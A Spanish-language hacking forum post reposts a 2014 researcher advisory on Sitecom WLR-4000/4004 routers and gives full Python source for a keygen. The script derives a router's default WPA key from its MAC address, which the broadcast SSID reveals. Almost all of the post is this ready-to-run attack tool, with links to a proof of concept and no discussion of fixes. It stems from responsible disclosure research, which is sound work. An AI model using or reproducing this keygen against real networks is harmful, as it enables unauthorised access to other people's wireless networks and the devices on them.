Foro de elhacker.net

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: *dudux en 26 Abril 2014, 23:30 pm



Título: Keygen para Routers SITECOMXXXXXX WLR4000 y WLR4004
Publicado por: *dudux en 26 Abril 2014, 23:30 pm
Sitecom firmware encryption and wireless keys
http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html

Reversing
(http://4.bp.blogspot.com/-z3jUIdaMwww/U1em_57qsKI/AAAAAAAAFbE/5qZuB47ujac/s1600/ida.png)

Algorithm
(http://2.bp.blogspot.com/-LrxqzczDJCo/U1ZpRA6r1PI/AAAAAAAAFaY/mTTeNqo1DdM/s1600/algo.png)

firmware encryption by using XOR  and its key leakage
(http://1.bp.blogspot.com/-pavk3WXKxn0/U1aCc4z4HnI/AAAAAAAAFa0/OoBHnE7TBOs/s1600/xor.png)


Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Proof-of-concept:
https://drive.google.com/file/d/0BzcoLOYkGWG6WFNhZGV6V2lKcW8/edit


Código:
#
# Default WPA key generator for Sitecom WLR-4000/4004 routers
# ===========================================================
#
# Authors:
#   Roberto Paleari     (@rpaleari)
#   Alessandro Di Pinto (@adipinto)
#
# Advisory URL:
#   http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html
#

import argparse
import os
import logging
import sys

# Charsets used for the generation of WPA key by different Sitecom models
CHARSETS = {
    "4000": (
        "23456789ABCDEFGHJKLMNPQRSTUVWXYZ38BZ",
        "WXCDYNJU8VZABKL46PQ7RS9T2E5H3MFGPWR2"
    ),

    "4004": (
        "JKLMNPQRST23456789ABCDEFGHUVWXYZ38BK",
        "E5MFJUWXCDKL46PQHAB3YNJ8VZ7RS9TR2GPW"
    ),
}

def generateKey(mac, model, keylength = 12):
    global CHARSETS
    assert model in CHARSETS
    
    charset1, charset2 = CHARSETS[model]
    assert len(charset1) == len(charset2)

    mac = mac.replace(":", "").decode("hex")
    assert len(mac) == 6

    val = int(mac[2:6].encode("hex"), 16)

    magic1 = 0x98124557
    magic2 = 0x0004321a
    magic3 = 0x80000000

    offsets = []
    for i in range(keylength):
        if (val & 0x1) == 0:
            val = val ^ magic2
            val = val >> 1
        else:
            val = val ^ magic1
            val = val >> 1
            val = val | magic3

        offset = val % len(charset1)
        offsets.append(offset)

    wpakey = ""
    wpakey += charset1[offsets[0]]

    for i in range(0, keylength-1):
        magic3 = offsets[i]
        magic1 = offsets[i+1]

        if magic3 != magic1:
            magic3 = charset1[magic1]
        else:
            magic3 = (magic3 + i) % len(charset1)
            magic3 = charset2[magic3]
        wpakey += magic3

    return wpakey
        

def main():
    global CHARSETS

    # Parse command-line arguments
    parser = argparse.ArgumentParser(formatter_class =
                                     argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-m", "--model", choices = CHARSETS.keys(),
                        required = True, help = "device model")
    parser.add_argument('mac', help = "MAC address")
    args = parser.parse_args()

    # Configure logging
    logging.basicConfig(format = '[%(asctime)s] %(levelname)s : %(message)s',
                        level = logging.DEBUG)

    # Generate SSID and WPA key
    ssid = "Sitecom%s" % args.mac.replace(":", "")[6:].upper()
    wpa = generateKey(args.mac, args.model)

    print "MAC:  %s" % args.mac
    print "SSID: %s" % ssid
    print "WPA:  %s" % wpa


if __name__ == "__main__":
    main()